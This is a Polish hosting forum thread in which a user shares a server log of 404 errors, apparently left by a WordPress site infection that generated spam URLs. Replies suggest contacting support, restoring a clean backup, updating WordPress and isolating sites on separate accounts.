2017-03-03 10:25:14.585 [INFO] [91.121.164.108:49756] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/2014/12/17/......................................./] 
2017-03-03 10:27:54.573 [INFO] [91.121.164.108:37282] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/.........................../] 
2017-03-03 10:28:14.575 [INFO] [91.121.164.108:39060] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/................................./] 
2017-03-03 10:28:18.887 [INFO] [91.121.175.91:46313] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/links/] 
2017-03-03 10:28:45.677 [INFO] [68.180.228.176:59246] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__32485_rqew_282_twpvv_376] 
2017-03-03 10:29:18.821 [INFO] [91.121.175.91:48428] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/cat_gallery/art/] 
2017-03-03 10:29:20.603 [INFO] [91.121.164.108:51728] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/......................../] 
2017-03-03 10:29:39.023 [INFO] [91.121.175.91:48896] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/......................................./] 
2017-03-03 10:30:18.841 [INFO] [91.121.175.91:50231] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/company/outline/] 
2017-03-03 10:30:38.828 [INFO] [91.121.175.91:50771] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/...................../] 
2017-03-03 10:30:58.829 [INFO] [91.121.175.91:51241] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/contact/] 
2017-03-03 10:31:18.813 [INFO] [91.121.175.91:52053] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/kumiko/arrange/] 
2017-03-03 10:31:39.132 [INFO] [91.121.175.91:52896] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/company/access/] 
2017-03-03 10:32:10.028 [INFO] [68.180.228.176:33062] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1773_fmusk__34910_rqew_282_twpvv_376] 
2017-03-03 10:32:18.846 [INFO] [91.121.175.91:54044] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/make_video/] 
2017-03-03 10:32:43.295 [INFO] [91.121.175.91:56263] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/company/] 
2017-03-03 10:33:06.111 [INFO] [68.180.228.176:41884] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__18592_rqew_282_twpvv_376] 
2017-03-03 10:33:58.831 [INFO] [91.121.175.91:60306] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/category/events/] 
2017-03-03 10:35:38.870 [INFO] [91.121.175.91:37975] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/info/] 
2017-03-03 10:35:54.859 [INFO] [68.180.228.176:40524] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__23510_rqew_282_twpvv_376] 
2017-03-03 10:35:58.841 [INFO] [91.121.175.91:38319] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/company/pamphlet/] 
2017-03-03 10:36:38.815 [INFO] [91.121.175.91:39214] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/..............................-.........-...-.............../] 
2017-03-03 10:36:48.690 [INFO] [68.180.228.176:49334] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__17317_rqew_282_twpvv_376] 
2017-03-03 10:37:18.823 [INFO] [91.121.175.91:39998] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/k.ino.kumikoart/] 
2017-03-03 10:37:38.856 [INFO] [91.121.175.91:40331] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/kumiko/] 
2017-03-03 10:38:38.876 [INFO] [68.180.228.176:40510] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1767_fmusk__40251_rqew_282_twpvv_376] 
2017-03-03 10:39:51.082 [INFO] [68.180.228.176:52832] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__46429_rqew_282_twpvv_376] 
2017-03-03 10:41:22.414 [INFO] [68.180.228.176:40086] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1766_fmusk__38123_rqew_282_twpvv_376] 
2017-03-03 10:42:55.706 [INFO] [68.180.228.176:55584] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__24089_rqew_282_twpvv_376] 
2017-03-03 10:44:14.577 [INFO] [91.121.164.108:38039] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/archives/224] 
2017-03-03 10:44:35.432 [INFO] [91.121.164.108:41176] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/contact-us] 
2017-03-03 10:45:54.590 [INFO] [91.121.164.108:47907] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/logo-charcters] 
2017-03-03 10:46:14.580 [INFO] [91.121.164.108:49828] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/access] 
2017-03-03 10:48:06.544 [INFO] [180.76.15.137:55818] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__10539_rqew_282_twpvv_376] 
2017-03-03 10:48:08.719 [INFO] [180.76.15.147:29962] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/robots.txt] 
2017-03-03 10:48:14.582 [INFO] [91.121.164.108:59971] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/works] 
2017-03-03 10:52:23.791 [INFO] [68.180.228.176:55038] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1777_fmusk__27104_rqew_282_twpvv_376] 
2017-03-03 10:54:14.576 [INFO] [91.121.164.108:45494] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/about-us] 
2017-03-03 10:57:00.949 [INFO] [68.180.228.176:37508] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1761_fmusk__9427_rqew_282_twpvv_376] 
2017-03-03 10:57:05.543 [INFO] [68.180.228.176:38054] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__14070_rqew_282_twpvv_376] 
2017-03-03 11:09:23.920 [INFO] [68.180.228.176:58122] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1773_fmusk__39468_rqew_282_twpvv_376] 
2017-03-03 11:10:45.735 [INFO] [68.180.228.176:42728] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__28832_rqew_282_twpvv_376] 
2017-03-03 11:17:19.660 [INFO] [68.180.228.176:45732] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__38816_rqew_282_twpvv_376] 
2017-03-03 11:18:28.991 [INFO] [68.180.228.176:56406] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1769_fmusk__44503_rqew_282_twpvv_376] 
2017-03-03 11:19:08.931 [INFO] [68.180.228.176:34124] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1765_fmusk__45189_rqew_282_twpvv_376] 
2017-03-03 11:20:57.838 [INFO] [68.180.228.176:49678] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1762_fmusk__33655_rqew_282_twpvv_376] 
2017-03-03 11:26:34.584 [INFO] [91.121.164.108:40945] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/page/2/] 
2017-03-03 11:26:54.613 [INFO] [91.121.164.108:42691] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/............/] 
2017-03-03 11:27:14.604 [INFO] [91.121.164.108:44389] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/........................................../] 
2017-03-03 11:27:34.583 [INFO] [91.121.164.108:45881] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/................................................................../] 
2017-03-03 11:28:14.570 [INFO] [91.121.164.108:49114] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/............/] 
2017-03-03 11:28:34.602 [INFO] [91.121.164.108:52654] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/................................................................../] 
2017-03-03 11:29:14.969 [INFO] [91.121.164.108:55647] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/................................................................../] 
2017-03-03 11:29:34.600 [INFO] [91.121.164.108:57137] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/............/] 
2017-03-03 11:30:34.583 [INFO] [91.121.164.108:33421] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/............/] 
2017-03-03 11:32:14.584 [INFO] [91.121.164.108:40902] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/.....................-...............-.........................../] 
2017-03-03 11:32:43.661 [INFO] [68.180.228.176:36572] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__41655_rqew_282_twpvv_376] 
2017-03-03 11:33:14.593 [INFO] [91.121.164.108:47511] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/................................./] 
2017-03-03 11:34:14.594 [INFO] [91.121.164.108:52917] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/......................................./] 
2017-03-03 11:34:35.465 [INFO] [68.180.228.176:51406] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1761_fmusk__46827_rqew_282_twpvv_376] 
2017-03-03 11:34:54.660 [INFO] [91.121.164.108:57601] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/................................................................../] 
2017-03-03 11:35:34.595 [INFO] [91.121.164.108:33423] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/................................................................../] 
2017-03-03 11:35:51.254 [INFO] [68.180.228.176:34016] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__35091_rqew_282_twpvv_376] 
2017-03-03 11:36:34.575 [INFO] [91.121.164.108:39560] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/.............................................................../] 
2017-03-03 11:37:34.570 [INFO] [91.121.164.108:44767] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/hattori-motors-group-...........................-3/] 
2017-03-03 11:38:34.589 [INFO] [91.121.164.108:51900] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/feed/] 
2017-03-03 11:38:54.574 [INFO] [91.121.164.108:53858] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/................................................................../] 
2017-03-03 11:41:31.891 [INFO] [68.180.228.176:50922] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__18807_rqew_282_twpvv_376] 
2017-03-03 11:42:56.942 [INFO] [68.180.228.176:35074] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1765_fmusk__39877_rqew_282_twpvv_376] 
2017-03-03 11:43:36.764 [INFO] [68.180.228.176:41532] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1767_fmusk__10071_rqew_282_twpvv_376] 
2017-03-03 11:45:57.865 [INFO] [68.180.228.176:36100] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__43406_rqew_282_twpvv_376] 
2017-03-03 11:48:34.176 [INFO] [68.180.228.176:59284] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1762_fmusk__33552_rqew_282_twpvv_376] 
2017-03-03 11:49:19.987 [INFO] [68.180.228.176:37538] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1766_fmusk__23147_rqew_282_twpvv_376] 
2017-03-03 11:50:33.288 [INFO] [68.180.228.176:48366] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__24056_rqew_282_twpvv_376] 
2017-03-03 11:52:14.614 [INFO] [68.180.228.176:36966] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1768_fmusk__47279_rqew_282_twpvv_376] 
2017-03-03 11:55:28.516 [INFO] [68.180.228.176:41734] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1760_fmusk__40806_rqew_282_twpvv_376] 
2017-03-03 11:59:18.287 [INFO] [68.180.228.176:46586] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__35917_rqew_282_twpvv_376] 
2017-03-03 12:07:31.548 [INFO] [203.133.171.81:48613] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/robots.txt] 
2017-03-03 12:09:51.909 [INFO] [68.180.228.176:44080] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__31149_rqew_282_twpvv_376] 
2017-03-03 12:12:55.503 [INFO] [68.180.228.176:43014] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1777_fmusk__35951_rqew_282_twpvv_376] 
2017-03-03 12:13:09.302 [INFO] [68.180.228.176:44940] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1772_fmusk__1880_rqew_282_twpvv_376] 
2017-03-03 12:13:44.395 [INFO] [66.249.64.181:57812] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1765_fmusk__3174_rqew_282_twpvv_376] 
2017-03-03 12:15:01.252 [INFO] [68.180.228.176:60196] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1769_fmusk__13289_rqew_282_twpvv_376] 
2017-03-03 12:20:09.783 [INFO] [51.255.64.29:52375] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/robots.txt] 
2017-03-03 12:21:37.854 [INFO] [68.180.228.176:33500] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1772_fmusk__9418_rqew_282_twpvv_376] 
2017-03-03 12:25:29.229 [INFO] [68.180.228.176:37578] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__35882_rqew_282_twpvv_376] 
2017-03-03 12:26:14.670 [INFO] [68.180.228.176:43558] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1764_fmusk__3865_rqew_282_twpvv_376] 
2017-03-03 12:28:29.660 [INFO] [68.180.228.176:32990] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__30640_rqew_282_twpvv_376] 
2017-03-03 12:34:55.164 [INFO] [68.180.228.176:60026] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__48027_rqew_282_twpvv_376] 
2017-03-03 12:34:56.260 [INFO] [66.249.64.181:44507] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__46404_rqew_282_twpvv_376] 
2017-03-03 12:38:15.247 [INFO] [68.180.228.176:59180] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1775_fmusk__25562_rqew_282_twpvv_376] 
2017-03-03 12:39:43.971 [INFO] [68.180.228.176:43450] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__39622_rqew_282_twpvv_376] 
2017-03-03 12:42:30.343 [INFO] [68.180.228.176:38766] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__35412_rqew_282_twpvv_376] 
2017-03-03 12:44:48.227 [INFO] [68.180.228.176:57592] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1761_fmusk__10053_rqew_282_twpvv_376] 
2017-03-03 12:47:17.171 [INFO] [68.180.228.176:49772] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__8462_rqew_282_twpvv_376] 
2017-03-03 12:51:21.076 [INFO] [68.180.228.176:55912] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1774_fmusk__42455_rqew_282_twpvv_376] 
2017-03-03 12:51:21.503 [INFO] [68.180.228.176:55970] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1778_fmusk__25730_rqew_282_twpvv_376] 
2017-03-03 12:51:55.548 [INFO] [68.180.228.176:60304] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1770_fmusk__11219_rqew_282_twpvv_376] 
2017-03-03 12:52:33.793 [INFO] [68.180.228.176:37380] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__22211_rqew_282_twpvv_376] 
2017-03-03 12:53:34.197 [INFO] [68.180.228.176:45870] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__46593_rqew_282_twpvv_376] 
2017-03-03 12:54:40.844 [INFO] [68.180.228.176:54310] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1766_fmusk__6985_rqew_282_twpvv_376] 
2017-03-03 12:56:14.587 [INFO] [91.121.164.108:47834] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/page_id=61] 
2017-03-03 12:56:54.593 [INFO] [91.121.164.108:52961] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/author=1] 
2017-03-03 12:58:14.581 [INFO] [91.121.164.108:59633] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/cat=1] 
2017-03-03 12:58:34.576 [INFO] [91.121.164.108:33317] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/p=388] 
2017-03-03 12:58:54.578 [INFO] [91.121.164.108:35077] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/p=375] 
2017-03-03 13:01:14.577 [INFO] [91.121.164.108:48114] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/p=398] 
2017-03-03 13:02:54.577 [INFO] [91.121.164.108:56428] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/paged=2] 
2017-03-03 13:03:34.602 [INFO] [91.121.164.108:60015] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/p=343] 
2017-03-03 13:04:39.146 [INFO] [68.180.228.176:48806] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__3015_rqew_282_twpvv_376] 
2017-03-03 13:04:54.590 [INFO] [91.121.164.108:40709] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/p=362] 
2017-03-03 13:06:34.579 [INFO] [91.121.164.108:48045] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/page_id=101] 
2017-03-03 13:07:14.586 [INFO] [91.121.164.108:51268] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/page_id=17] 
2017-03-03 13:08:27.012 [INFO] [68.180.228.176:55672] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__37360_rqew_282_twpvv_376] 
2017-03-03 13:09:03.073 [INFO] [91.121.164.108:36592] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/work/590.html] 
2017-03-03 13:09:57.739 [INFO] [68.180.228.176:41424] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1766_fmusk__30431_rqew_282_twpvv_376] 
2017-03-03 13:11:14.573 [INFO] [91.121.164.108:49377] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/company] 
2017-03-03 13:11:34.571 [INFO] [91.121.164.108:51415] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/work/] 
2017-03-03 13:12:14.569 [INFO] [91.121.164.108:54225] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/works/cat05/] 
2017-03-03 13:12:34.232 [INFO] [68.180.228.176:37920] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1766_fmusk__2341_rqew_282_twpvv_376] 
2017-03-03 13:13:34.569 [INFO] [91.121.164.108:33282] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/sadwat/] 
2017-03-03 13:14:14.590 [INFO] [91.121.164.108:36339] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/pro/sadaaki-watanabe] 
2017-03-03 13:15:34.598 [INFO] [91.121.164.108:43801] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/works/cat02/] 
2017-03-03 13:16:34.596 [INFO] [91.121.164.108:49833] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/flow/] 
2017-03-03 13:16:41.927 [INFO] [68.180.228.176:46454] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1774_fmusk__34460_rqew_282_twpvv_376] 
2017-03-03 13:17:14.838 [INFO] [91.121.164.108:53066] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/work/602.html] 
2017-03-03 13:18:14.581 [INFO] [91.121.164.108:57242] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/flow] 
2017-03-03 13:18:34.611 [INFO] [91.121.164.108:58937] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/works/cat01/] 
2017-03-03 13:18:54.587 [INFO] [91.121.164.108:60406] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/work/628.html] 
2017-03-03 13:19:05.397 [INFO] [68.180.228.176:41544] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1767_fmusk__8438_rqew_282_twpvv_376] 
2017-03-03 13:19:14.726 [INFO] [91.121.164.108:33848] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/works/cat03/] 
2017-03-03 13:19:54.575 [INFO] [91.121.164.108:36522] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/works/cat04/] 
2017-03-03 13:20:14.576 [INFO] [91.121.164.108:38080] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/sadaaki.watanabe] 
2017-03-03 13:20:34.599 [INFO] [91.121.164.108:40997] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/22448883/] 
2017-03-03 13:21:34.605 [INFO] [91.121.164.108:45987] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/void(0);] 
2017-03-03 13:25:45.382 [INFO] [68.180.228.176:43980] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__12350_rqew_282_twpvv_376] 
2017-03-03 13:32:46.036 [INFO] [68.180.228.176:48250] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1773_fmusk__24668_rqew_282_twpvv_376] 
2017-03-03 13:33:28.793 [INFO] [68.180.228.176:54544] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__41308_rqew_282_twpvv_376] 
2017-03-03 13:36:14.201 [INFO] [68.180.228.176:50578] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1761_fmusk__23549_rqew_282_twpvv_376] 
2017-03-03 13:38:20.598 [INFO] [68.180.228.176:41192] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1773_fmusk__33630_rqew_282_twpvv_376] 
2017-03-03 13:41:28.780 [INFO] [68.180.228.176:41540] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__17473_rqew_282_twpvv_376] 
2017-03-03 13:43:49.285 [INFO] [51.254.214.211:47280] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/robots.txt] 
2017-03-03 13:43:50.979 [INFO] [51.254.214.211:47280-2#APVH_www.chwilowkanadowod.eu] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/Po..yczki] 
2017-03-03 13:45:22.946 [INFO] [68.180.228.176:48624] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1762_fmusk__9552_rqew_282_twpvv_376] 
2017-03-03 13:46:49.709 [INFO] [162.216.19.183:45010] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/404testpage4525d2fdc] 
2017-03-03 13:46:50.086 [INFO] [162.216.19.183:45014] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/404javascript.js] 
2017-03-03 13:46:50.448 [INFO] [162.216.19.183:45030] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/function.require] 
2017-03-03 13:49:12.838 [INFO] [68.180.228.176:52768] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1763_fmusk__31064_rqew_282_twpvv_376] 
2017-03-03 13:51:11.133 [INFO] [68.180.228.176:42866] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1762_fmusk__31097_rqew_282_twpvv_376] 
2017-03-03 13:51:14.574 [INFO] [91.121.164.108:48727] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/page_id=19] 
2017-03-03 13:51:34.578 [INFO] [91.121.164.108:50010] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/utoyatoya/gotonext] 
2017-03-03 13:51:49.047 [INFO] [68.180.228.176:48328] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1767_fmusk__17824_rqew_282_twpvv_376] 
2017-03-03 13:51:54.589 [INFO] [91.121.164.108:51140] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/page_id=6] 
2017-03-03 13:52:02.888 [INFO] [68.180.228.176:50214] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1765_fmusk__13289_rqew_282_twpvv_376] 
2017-03-03 13:52:34.572 [INFO] [91.121.164.108:55228] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/page_id=8] 
2017-03-03 13:52:54.597 [INFO] [91.121.164.108:56666] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/page_id=60] 
2017-03-03 13:54:11.861 [INFO] [68.180.228.176:40202] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1779_fmusk__5356_rqew_282_twpvv_376] 
2017-03-03 13:54:14.601 [INFO] [91.121.164.108:34452] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/go/getflashplayer] 
2017-03-03 13:54:32.076 [INFO] [66.249.64.185:36469] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1769_fmusk__13818_rqew_282_twpvv_376] 
2017-03-03 13:55:22.949 [INFO] [66.249.64.181:34261] File not found [/home/mercuryw/domains/chwilowkanadowod.eu/public_html/skxkvegg_1779_fmusk__44051_rqew_282_twpvv_376] 

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość Spoofy

a kontaktowałeś się z supportem Hekko żeby Ci pomogli? Można też przywrócić jakąś czystą kopię z backup'u i poaktualizować.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość Kamikadze

WP zaktualizuj, odseparuj wszystkie strony od siebie instalując je na innym koncie i obesrwuj czy infekuje ci 1 czy więcej skryptów. W obrębie jednego konta możesz mieć dziurawą jedną stronę a infekcja uzyska dostęp do pozostałych.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się


×